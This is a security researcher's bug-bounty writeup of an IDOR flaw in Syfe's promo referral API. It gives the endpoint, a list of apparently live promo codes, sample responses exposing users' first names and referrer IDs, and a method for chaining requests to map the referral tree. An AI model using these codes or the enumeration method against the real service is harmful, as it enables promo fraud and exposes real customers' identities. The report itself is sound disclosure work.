PortfolioBug Hunter ProfileGithub

🫐Syfe

Pa, me importa un qlo que sea informativo, igual es crecimiento pa mi si sabe.

Summary:

An Insecure Direct Object Reference (IDOR) vulnerability was discovered in Syfe’s promo code system, allowing unauthorized access to valid referral codes and exposing invitee names. This flaw could be exploited to fraudulently redeem promo codes, leading to financial losses, and reputational damage. Additionally, a deeper issue was identified in the referral system, which exposes a hierarchical structure of users by iterating over referrerAppliedCode, potentially leading to mass user data exposure.

Technical Details:

  1. The invite system uses API endpoints like:

GET /promo/referral/SRPTUW33H HTTP/2
Host: api.syfe.com

  • The server responds with a 200 OK, revealing valid promo code details.

  • The referrerAppliedCode field remains null, indicating unused promo codes that could be exploited.

Burp Repeater - API Syfer:

Syfer API Browser:

  1. The promo codes are also accessible via:

https://www.syfe.com/invite?PROMO=SRPTUW33H

  • This endpoint exposes the referrer’s name (e.g., Sze Wei), leading to potential privacy violations.

  1. Categorization of Promo Codes Based on Referral Status:

  • Codes Without a Referrer (referrerAppliedCode: NULL):

    • SRP16LW72, SRPQ9XPUD, SRPS4H3NH, SRPVW9182, SRPRRBGSF, SRPRYKNMN, SRPSURFGP, SRPSSMRCG, SRPSSMNGY, SRPSXQDTY, SRPT2KZFA, SRP6X8B8Y, SRPTEBYFA, SRPTGPUD2, SRPTNFL5D, SRPTUW33H, sgsmi, NOMONEYLAH

  • Codes with an Existing Referrer (referrerAppliedCode: <code>):

    • SRP6G4YN8, SRPRDR9KS, SRPS4P5YC, SRPSL8MGX, SRPT54W4C, SRPTXDRBM, SRPSTTW7Y, SRPTJDXHM, SRPTH8LK3

  1. Mapping User Referral Hierarchy:

  • By leveraging the referrerAppliedCode value in a request, it is possible to retrieve another user’s referrerId and firstName.

  • By following the referrerAppliedCode chain, it is possible to reconstruct a tree-like structure of referrals.

Example of exploitation:

  1. Requesting /promo/referral/SRPTXDRBM returns:

{ "firstName": "Heng", "referrerId": 592559147, "referrerAppliedCode": "SRPSTTW7Y" }

  1. Using SRPSTTW7Y in a new request reveals another user:

{ "firstName": "VICTOR", "referrerId": 555275190, "referrerAppliedCode": "SRP6X8B8Y" }

    • Continuing this process (with the others PROMOCodes that i've found) reveals a full referral tree, potentially exposing thousands of user identities.

  2. Entropy analysis of referral codes identified a predictable pattern in their structure, making enumeration feasible.

  3. Attempting to redeem a retrieved promo code results in: "Promo code is currently under review. You will receive the benefits if you meet all the terms and conditions of the promos."

    • This suggests attackers could create fake accounts to exploit promotional bonuses.

Steps To Reproduce:

For this case I will leave you a super fast video as a proof of concept explaining the step by step from burp and the step by step easy:

  1. open URL: https://api.syfe.com/promo/referral/<code> and replace with the PromoCodes of this report in section 3. Categorization of Promo Codes Based on Referral Status

  1. Open URL Syfe Main Website: https://www.syfe.com/invite?PROMO=<code>

  1. that's all

Impact

  1. Financial Fraud: Attackers can mass-harvest promo codes, create fake accounts, and exploit referral rewards, causing significant financial losses.

  2. User Data Exposure: Real names and referral relationships are publicly accessible, leading to privacy breaches and phishing risks.

  3. Reputation Damage: Public exposure of invitee data erodes user trust, potentially harming the company’s credibility and compliance standing.

  4. Hierarchical Exposure: Attackers can map user referral chains, enabling targeted scams and account takeovers.

Recommendation:

  • Remove referrerId and referrerAppliedCode from public responses.

  • Restrict access to promo codes, requiring authentication.

  • Increase entropy in promo code generation to prevent easy enumeration.

  • Enforce additional validation before applying promo codes.

  • Monitor exploitation attempts through logging and rate limiting.

Conclusion:

This IDOR vulnerability exposes promo codes and user invite details, allowing unauthorized use and potential fraud. The ability to traverse the referral hierarchy further exacerbates the risk, exposing user relationships and identifiers. Mitigating this issue will prevent abuse and reinforce user trust in Syfe’s security framework.

Thank you,

Juan Felipe - Security Researcher

PreviousUser Enumeration via Authentication Flow - Email ExposureNextEtoro

Last updated